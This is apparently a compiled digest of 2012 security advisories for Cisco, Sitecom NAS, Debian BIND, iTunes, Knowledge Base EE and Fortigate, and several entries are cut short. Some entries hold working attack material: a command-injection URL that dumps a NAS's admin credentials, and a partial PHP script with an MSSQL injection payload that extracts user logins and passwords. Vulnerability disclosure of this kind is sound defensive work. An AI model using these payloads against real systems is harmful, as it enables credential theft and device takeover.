Cisco Security Advisory: Cisco ASA-CX and Cisco PRSM Log Retention Denial of Service Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cisco ASA-CX and Cisco PRSM Log Retention Denial of Service Vulnerability Advisory ID: cisco-sa-20120912-asacx Revision 1.0 For Public Release 2012 September 12 16:00 UTC (GMT) +- Summary === Cisco ASA-CX Context-Aware Security appliance and Cisco Prime Security Manager (PRSM) contain a denial of service (DoS) vulnerability in versions prior to 9.0.2-103. Successful exploitation of this vulnerability on the Cisco ASA-CX could cause the device to stop processing user traffic and prevent management access to the Cisco ASA-CX. Successful exploitation of this vulnerability on the Cisco PRSM could cause the software to become unresponsive and unavailable. There are no workarounds for this vulnerability, but some mitigations are available. Cisco has released free software updates that address this vulnerability. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120912-asacx -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.18 (Darwin) Comment: GPGTools - http://gpgtools.org iF4EAREIAAYFAlBQmfIACgkQUddfH3/BbTqiYwD/XvyTOxUAsm5SUk6SQz2gSvJQ MRJ/YAAaW54eH5HykGwA/j19RyMKO9JLs5Hj+E6lDsbVjl4azUf2XkBI+Zt/jS+B =eNJC -END PGP SIGNATURE-
Cisco Security Advisory: Cisco Unified Presence and Jabber Extensible Communications Platform Stream Header Denial of Service Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cisco Unified Presence and Jabber Extensible Communications Platform Stream Header Denial of Service Vulnerability Advisory ID: cisco-sa-20120912-cupxcp Revision 1.0 For Public Release 2012 September 12 16:00 UTC (GMT) +- Summary === A denial of service (DoS) vulnerability exists in Cisco Unified Presence and Jabber Extensible Communications Platform (Jabber XCP). An unauthenticated, remote attacker could exploit this vulnerability by sending a specially crafted Extensible Messaging and Presence Protocol (XMPP) stream header to an affected server. Successful exploitation of this vulnerability could cause the Connection Manager process to crash. Repeated exploitation could result in a sustained DoS condition. There are no workarounds available to mitigate exploitation of this vulnerability. Cisco has released free software updates that address this vulnerability. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120912-cupxcp -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.18 (Darwin) Comment: GPGTools - http://gpgtools.org iF4EAREIAAYFAlBQmfoACgkQUddfH3/BbTr41QEAiEtU1YJmRk9YpE1gC5mlqWDN nfdqWNCjaeDKfgnJjYYA/jqFNpCPCHjUL4Oon847zNnduIW2CY9SBrWc9g2iYLNL =qvOa -END PGP SIGNATURE-
Security Advisory AA-007: Arbitrary File Upload Vulnerability in Sitecom Home Storage Center
Security Advisory AA-007: Arbitrary File Upload Vulnerability in Sitecom Home Storage Center Severity Rating: High Discovery Date: July 29, 2012 Vendor Notification: July 30, 2012 Disclosure Date: September 11, 2012 Vulnerability Type= Arbitrary file upload Impact= Loss of system integrity Severity= Alcyon rates the severity of this vulnerability as high due to the following properties: - Ease of exploitation; - No authentication credentials required; - No knowledge about individual victims required; - No interaction with the victim required. Products and firmware versions affected= - Sitecom MD-253 firmware version up to and including 2.4.17 - Sitecom MD-254 firmware version up to and including 2.4.17 - Possibly other rebranded Mapower network storage products Risk Assessment= An attacker can upload arbitrary files to the device. Combining the command injection vulnerability described in advisory AA-008 an attacker can obtain a remote root shell. Vulnerability= The CGI executable that is responsible for handling firmware updates allows arbitrary files to be uploaded to the /tmp folder. Furthermore the files are automatically assigned execute permissions and are owned by root. Proof of Concept Exploit= PoC code exploiting this and other vulnerabilities to obtain an interactive root shell can be found here: - http://www.alcyon.nl/blog/sitecom-poc-exploit Risk Mitigation= At the time of disclosure no updated firmware version was available. We recommend that you limit access to the web management UI of the device by utilizing proper packet filtering and/or NAT on your router in order to limit network access to your NAS. Note that this will not completely eliminate the risk of exploitation, since the product is affected by other vulnerabilities that can be leveraged using client side attacks. Vendor responses= None Fixed Versions= There is currently no vendor patch available. A third party solution is available on: - http://www.alcyon.nl/blog/sitecom-nas-md-253-and-md-254-risk-mitigation/ Latest version of this advisory= - http://www.alcyon.nl/advisories/aa-007 References= Security Advisory AA-008: Command Injection Vulnerability in Sitecom Home Storage Center - http://www.alcyon.nl/advisories/aa-008
Security Advisory AA-007: Command Injection Vulnerability in Sitecom Home Storage Center
Security Advisory AA-007: Command Injection Vulnerability in Sitecom Home Storage Center Severity Rating: High Discovery Date: July 29, 2012 Vendor Notification: July 30, 2012 Disclosure Date: September 12, 2012 Vulnerability Type= Command injection Impact= System access Severity= Alcyon rates the severity of this vulnerability as high due to the following properties: - Ease of exploitation; - No authentication credentials required; - No knowledge about individual victims required; - No interaction with the victim required. Products and firmware versions affected= - Sitecom MD-253 firmware version up to and including 2.4.17 - Sitecom MD-254 firmware version up to and including 2.4.17 - Possibly other rebranded Mapower network storage products Risk Assessment= An attacker can execute commands as the root user. This allows for the download and execution of arbitrary binaries and shell scripts to gain complete control over the device. Vulnerability= The installer.cgi script allows commands to be injected. A limitation exists in the fact that commands can only exist of characters that are not subject to URL-encoding. However, the hexadecimal representation of the space character (%20) gets converted to a space. Proof of Concept Exploit= Paste the following line into a browser address bar to display the device's admin credentials: http://victimIP/cgi-bin/installer.cgi?SetExecTablecat%20/etc/sysconfig/config/webmaster.conf PoC code exploiting this and other vulnerabilities to obtain an interactive root shell can be found here: - http://www.alcyon.nl/blog/sitecom-poc-exploit Risk Mitigation= At the time of disclosure no updated firmware version was available. We recommend that you limit access to the web management UI of the device by utilizing proper packet filtering and/or NAT on your router in order to limit network access to your NAS. Note that this will not completely eliminate the risk of exploitation, since the product is affected by other vulnerabilities that can be leveraged using client side attacks. Vendor responses= None Fixed Versions= There is currently no vendor patch available. A third party solution is available on: - http://www.alcyon.nl/blog/sitecom-nas-md-253-and-md-254-risk-mitigation/ Latest version of this advisory= - http://www.alcyon.nl/advisories/aa-008 References= Security Advisory AA-007: Arbitrary File Upload Vulnerability in Sitecom Home Storage Center - http://www.alcyon.nl/advisories/aa-007
[SECURITY] [DSA 2547-1] bind9 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2547-1 secur...@debian.org http://www.debian.org/security/Florian Weimer September 12, 2012 http://www.debian.org/security/faq - - Package: bind9 Vulnerability : improper assert Problem type : remote Debian-specific: no CVE ID : CVE-2012-4244 It was discovered that BIND, a DNS server, does not handle DNS records properly which approach size limits inherent to the DNS protocol. An attacker could use crafted DNS records to crash the BIND server process, leading to a denial of service. For the stable distribution (squeeze), this problem has been fixed in version 1:9.7.3.dfsg-1~squeeze7. We recommend that you upgrade your bind9 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJQUO2GAAoJEL97/wQC1SS+73sH/1cqWEgYuMvKkTy+vW1DuTqd LOp7YcqQsHWKBW1DbE1WUy09k5fGeNNu+UhFITUoiHjXZIBtVen0g1pHfxAy2g59 Fo2dpJhoushOC57+4Sf+UJbfYO3Uv1zSTYYyCdiG9Df4AFOFLLPZvxIcCnjM+fhy DksM/U9T4fwgx+N3vb1EvTK3FZXkaniOuB7GNl5REfxMi/8vCSigsOOeWlPHcnuc SGJnYmuLpfCp+iSqCUzotDGlEL/HBVUozLXSVEPaKwEpc5dj7s+zJSFBt+FQij25 d6RRa1fetnzEGQSbocnko9DjiGeidkQIcmlAvFLy6i9XIsmyg6Xu5gN4/4P6To8= =O6mH -END PGP SIGNATURE-
APPLE-SA-2012-09-12-1 iTunes 10.7
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 APPLE-SA-2012-09-12-1 iTunes 10.7 iTunes 10.7 is now available and addresses the following: WebKit Available for: Windows 7, Vista, XP SP2 or later Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in WebKit. These issues are addressed through improved memory handling. CVE-ID CVE-2011-3016 : miaubiz CVE-2011-3021 : Arthur Gerkis CVE-2011-3027 : miaubiz CVE-2011-3032 : Arthur Gerkis CVE-2011-3034 : Arthur Gerkis CVE-2011-3035 : wushi of team509 working with iDefense VCP, Arthur Gerkis CVE-2011-3036 : miaubiz CVE-2011-3037 : miaubiz CVE-2011-3038 : miaubiz CVE-2011-3039 : miaubiz CVE-2011-3040 : miaubiz CVE-2011-3041 : miaubiz CVE-2011-3042 : miaubiz CVE-2011-3043 : miaubiz CVE-2011-3044 : Arthur Gerkis CVE-2011-3050 : miaubiz CVE-2011-3053 : miaubiz CVE-2011-3059 : Arthur Gerkis CVE-2011-3060 : miaubiz CVE-2011-3064 : Atte Kettunen of OUSPG CVE-2011-3068 : miaubiz CVE-2011-3069 : miaubiz CVE-2011-3071 : pa_kt working with HP's Zero Day Initiative CVE-2011-3073 : Arthur Gerkis CVE-2011-3074 : Slawomir Blazek CVE-2011-3075 : miaubiz CVE-2011-3076 : miaubiz CVE-2011-3078 : Martin Barbella of the Google Chrome Security Team CVE-2011-3081 : miaubiz CVE-2011-3086 : Arthur Gerkis CVE-2011-3089 : Skylined of the Google Chrome Security Team, miaubiz CVE-2011-3090 : Arthur Gerkis CVE-2011-3105 : miaubiz CVE-2011-3913 : Arthur Gerkis CVE-2011-3924 : Arthur Gerkis CVE-2011-3926 : Arthur Gerkis CVE-2011-3958 : miaubiz CVE-2011-3966 : Aki Helin of OUSPG CVE-2011-3968 : Arthur Gerkis CVE-2011-3969 : Arthur Gerkis CVE-2011-3971 : Arthur Gerkis CVE-2012-0682 : Apple Product Security CVE-2012-0683 : Dave Mandelin of Mozilla CVE-2012-1520 : Martin Barbella of the Google Chrome Security Team using AddressSanitizer, Jose A. Vazquez of spa-s3c.blogspot.com working with iDefense VCP CVE-2012-1521 : Skylined of the Google Chrome Security Team, Jose A. Vazquez of spa-s3c.blogspot.com working with iDefense VCP CVE-2012-2817 : miaubiz CVE-2012-2818 : miaubiz CVE-2012-2829 : miaubiz CVE-2012-2831 : miaubiz CVE-2012-2842 : miaubiz CVE-2012-2843 : miaubiz CVE-2012-3589 : Dave Mandelin of Mozilla CVE-2012-3590 : Apple Product Security CVE-2012-3591 : Apple Product Security CVE-2012-3592 : Apple Product Security CVE-2012-3593 : Apple Product Security CVE-2012-3594 : miaubiz CVE-2012-3595 : Martin Barbella of Google Chrome Security CVE-2012-3596 : Skylined of the Google Chrome Security Team CVE-2012-3597 : Abhishek Arya of Google Chrome Security Team using AddressSanitizer CVE-2012-3598 : Apple Product Security CVE-2012-3599 : Abhishek Arya of Google Chrome Security Team using AddressSanitizer CVE-2012-3600 : David Levin of the Chromium development community CVE-2012-3601 : Martin Barbella of the Google Chrome Security Team using AddressSanitizer CVE-2012-3602 : miaubiz CVE-2012-3603 : Apple Product Security CVE-2012-3604 : Skylined of the Google Chrome Security Team CVE-2012-3605 : Cris Neckar of the Google Chrome Security team CVE-2012-3606 : Abhishek Arya of the Google Chrome Security Team using AddressSanitizer CVE-2012-3607 : Abhishek Arya of the Google Chrome Security Team using AddressSanitizer CVE-2012-3608 : Skylined of the Google Chrome Security Team CVE-2012-3609 : Skylined of the Google Chrome Security Team CVE-2012-3610 : Skylined of the Google Chrome Security Team CVE-2012-3611 : Apple Product Security CVE-2012-3612 : Skylined of the Google Chrome Security Team CVE-2012-3613 : Abhishek Arya of the Google Chrome Security Team using AddressSanitizer CVE-2012-3614 : Yong Li of Research In Motion, Inc. CVE-2012-3615 : Stephen Chenney of the Chromium development community CVE-2012-3616 : Abhishek Arya of the Google Chrome Security Team using AddressSanitizer CVE-2012-3617 : Apple Product Security CVE-2012-3618 : Abhishek Arya of Google Chrome Security Team using AddressSanitizer CVE-2012-3620 : Abhishek Arya of Google Chrome Security Team CVE-2012-3621 : Skylined of the Google Chrome Security Team CVE-2012-3622 : Abhishek Arya of the Google Chrome Security Team using AddressSanitizer CVE-2012-3623 : Skylined of the Google Chrome Security Team CVE-2012-3624 : Skylined of the Google Chrome Security Team CVE-2012-3625 : Skylined of Google Chrome Security Team CVE-2012-3626 : Apple Product Security CVE-2012-3627 : Skylined and Abhishek Arya of Google Chrome Security team CVE-2012-3628 : Apple Product Security CVE-2012-3629 : Abhishek Arya of Google Chrome Security Team using AddressSanitizer CVE-2012-3630 : Abhishek Arya of Google Chrome Security Team using AddressSanitizer CVE-2012-3631 : Abhishek Arya of Google Chrome Security Team using AddressSanitizer CVE-2012-3632 : Abhishek Arya of the Google Chrome Security Team using AddressSanitizer CVE-2012-3633 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3634 : Martin
Knowledge Base EE v4.62.0 - SQL Injection Vulnerability
Title: == Knowledge Base EE v4.62.0 - SQL Injection Vulnerability Date: = 2012-09-11 References: === http://www.vulnerability-lab.com/get_content.php?id=702 VL-ID: = 702 Common Vulnerability Scoring System: 8.5 Introduction: = Knowledge Base Software, by Novo Solutions can be used in a variety of in-house and external application settings. Our easy-to-use software is an ideal solution for small or Knowledge Base Softwarelarge organizations who need a central repository to store information for Customer Support, Company Intranet, Employee Training, Document Management and more. (copy from vendor website http://www.novosolutions.com/knowledge-base-software ) Abstract: = The Vulnerability Laboratory Research Team discovered a critical sql vulnerability in the Knowledge Base Enterprise Edition v4.62.0. Report-Timeline: 2012-09-06: Researcher Notification Coordination 2012-09-07: Vendor Notification 2012-00-00: Vendor Response/Feedback 2012-00-00: Vendor Fix/Patch 2012-00-00: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: A SQL Injection vulnerability a misconfiguration are detected in Knowledge Base Enterprise Edition 4.62.0. The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands on the affected application dbms without user inter action. The vulnerabilities are located in search module when processing to request the category variable with selcategory argument. Successful exploitation of the vulnerability results in MSSQL dbms ASP application compromise. Vulnerable File(s): [+] doadvancedsearch.asp Vulnerable Parameter(s): [+] category Condition [+] selcategory - must be not NULL Proof of Concept: = The sql injection vulnerability can be exploited by remote attackers without user inter action and without privilege user account. For demonstration or reproduce ... Note: In this report we have the Clause statement it a little bit hard to exploit it because of 90% non active responses with errors. In order to exploit this vulnerability we need to use (CAST OR CONVERT) MSSQL functions to obtain result of our query in Conversion Error messages. Query: CAST(USER_LOGIN AS NVARCHAR(4000) Result: [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'admin' to data type int. In the proof of concept exploit we have to change and force the query to retrieve users credential from user database requests. ?php error_reporting(0); /* * Software Knowledge Base Enterprise Edition 4.62.00 * Database: MS SQL * Description * Author Kami * Emailk...@vulnerability-lab.com * Website http://www.kami.ma * vendor http://www.novosolutions.com/knowledge-base-software/ * Exploitation-type MSSQL error-based using . * Exploitation-technique(CAST OR CONVERT) Via (WHERE or HAVING) clause. */ /* Define Target Informations */ $HOST=$argv[1]; $URI =/doadvancedsearch.asp; /* DATABASE Params */ $TABLE =USERS; $columns=array(USER_LOGIN,USER_PASSWORD); $evilSQL =-6647) UNION ALL SELECT CHAR(107)+CHAR(97)+CHAR(109)+CHAR(105)+CHAR(58)+CHAR(58)+MAX(ISNULL(CAST({column_name} AS NVARCHAR(4000)),CHAR(32)))+CHAR(58)+CHAR(58)+CHAR(97)+CHAR(109)+CHAR(105) FROM USERS where USER_ID=1 -- ; $Exploit= new Exploitcore(); if($argc 1) { echo \n.'[+] Exploitation Start \\\ .--. /// (:::)(_)():- `--° \\\ Exploit sent/// '.\n; if(isset($argv[2])) $URI=$argv[2].$URI; echo [+] URL : .$argv[1].$argv[2].\n; $n=1; foreach($columns as $column){ $evilSQL =-6647) UNION ALL SELECT CHAR(107)+CHAR(97)+CHAR(109)+CHAR(105)+CHAR(58)+CHAR(58)+MAX(ISNULL(CAST({column_name} AS NVARCHAR(4000)),CHAR(32)))+CHAR(58)+CHAR(58)+CHAR(97)+CHAR(109)+CHAR(105) FROM USERS where USER_ID=1 -- ; $evilSQL=str_replace({column_name},$column,$evilSQL); $Payload=array( advsearchwords=sds, selcategory=19, category=$evilSQL, operation=%2B, limit=25, searchtype=1, enableExclude=1, enableInclude=1, daterange=0,
Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities
Title: == Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities Date: = 2012-09-06 References: === http://www.vulnerability-lab.com/get_content.php?id=557 VL-ID: = 557 Common Vulnerability Scoring System: 5 Introduction: = The FortiGate series of multi-threat security systems detect and eliminate the most damaging, content-based threats from email and Web traffic such as viruses, worms, intrusions, inappropriate Web content and more in real time - without degrading network performance. Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 series for large enterprises, service providers and carriers, the FortiGate line combines the FortiOS™ security operating system with FortiASIC processors and other hardware to provide a comprehensive and high-performance array of security and networking functions including: * Firewall, VPN, and Traffic Shaping * Intrusion Prevention System (IPS) * Antivirus/Antispyware/Antimalware * Web Filtering * Antispam * Application Control (e.g., IM and P2P) * VoIP Support (H.323. and SCCP) * Layer 2/3 routing * Multiple WAN interface options FortiGate appliances provide cost-effective, comprehensive protection against network, content, and application-level threats - including complex attacks favored by cybercriminals - without degrading network availability and uptime. FortiGate platforms incorporate sophisticated networking features, such as high availability (active/active, active/passive) for maximum network uptime, and virtual domain (VDOM) capabilities to separate various networks requiring different security policies. Since 2009 Fortigate appliance series got certified by the U.S. Army and is now listed in the Information Assurance Approved Products List (IA APL). The military provides high security standards to secure outdoor camps, air base, offices with fortigate hardware. (Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate ) Abstract: = Vulnerability-Lab Research Team discovered multiple persistent Web Vulnerabilities in the FortiGate UTM Appliance Application. Report-Timeline: 2012-05-06: Researcher Notification Coordination 2012-05-10: Vendor Notification 2012-06-11: Vendor Response/Feedback 2012-08-25: Vendor Fix/Patch ( Fixed in FortiOS v4.3.8 B0537 Fixed in FortiOS v5.0 ) 2012-09-06: Public or Non-Public Disclosure Status: Published Affected Products: == Fortigate Product: UTM Appliance Application vFortiGate-5000 Series;FortiGate-3950 Series;FortiGate-3810A; Exploitation-Technique: === Remote Severity: = High Details: Multiple input validation vulnerabilities(persistent) are detected in the FortiGate UTM Appliance Application. Remote attackers low privileged user accounts can inject (persistent) own malicious script code to manipulate specific customer/admin requests. The vulnerability allows an local low privileged attacker to manipulate the appliance(application) via persistent script code inject. The vulnerability is locaed in the Add or Tags module category listing with the bound vulnerable applied tags tags display parameters. Successful exploitation results in content module request manipulation, execution of persistent malicious script code, session hijacking, account steal persistent phishing. Vulnerable Module(s): (Persistent) [+] Tags - Applied tags [+] Add - Tags Display Interface - UTM WAF Web Application [Appliance] FortiGate-5000 Series;FortiGate-3950 Series;FortiGate-3810A;FortiGate-3600A;FortiGate-3016B;FortiGate-1240B FortiGate-800;FortiGate-620B;FortiGate-311B;FortiGate-310B;FortiGate-300A;FortiGate-224B;FortiGate-200B Series Proof of Concept: = The persistent vulnerabilities can be exploited by remote attackers with low required user inter action or low privileged user account. For demonstration or reproduce ... Code Review:Tags - Applied tags [Box] Listing URL: http://appliance.127.0.0.1:1337/firewall/policy/policy6?expanded=# name=``addr_dlg`` action=``/firewall/address/add`` onsubmit=``if (!fwad_form_check('Please choose one address/group.', 'Please choose one interface to connect.')) return false; if (document.forms[0].submitFlag) return false; document.forms[0]. submitFlag = true;`` tabletbodytr td align=``left`` width=``150``nobrAddress Name/nobr/td td align=``left``input name=``name`` size=``64`` maxlength=``63`` value=``all`` type=``text`` /td /tr tr tdColor/td tdspan colorclassprefix=``addr_ipv6_ `` class=``icon_fw addr_ipv6_13`` id=``addressIcon``/span a href=``#`` id=``addressColor`` cscolorvalue=``0``[Change]input value=``13`` name=``csColor1``